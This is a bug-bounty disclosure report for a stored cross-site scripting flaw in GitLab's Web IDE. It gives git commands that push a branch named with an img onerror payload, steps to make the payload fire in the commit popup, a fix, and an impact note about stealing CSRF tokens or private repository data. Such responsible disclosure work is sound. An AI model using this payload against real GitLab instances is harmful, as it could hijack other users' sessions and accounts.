Stored XSS in Branch-name when committing to branch from Web IDE
Link: https://hackerone.com/reports/365079 By: @fransrosen
The following flow is needed to simulate:
git init echo "hej" > test git remote add origin git://gitlab-repo git checkout -b '<img/src='x'/onerror=alert(document.domain)>' git add . git commit -m "test" git push origin '<img/src='x'/onerror=alert(document.domain)>'
Then go to the file in the branch named
<img/src='x'/onerror=alert(document.domain)> in GitLab. Edit the file using "Web IDE", then edit the file. The commit-button should show up:
Here's a video showing the scenario:
Properly sanitize the branch name in the Commit-popup.
The stored XSS is triggering for anyone, also triggering on gitlab.com, and it can trigger on public repos. You could easily build a PoC that would modify the email address of the current user or stealing their CSRF-token as soon as the script triggers, or try stealing information about the user's other private repositories.
Regards, Frans Rosén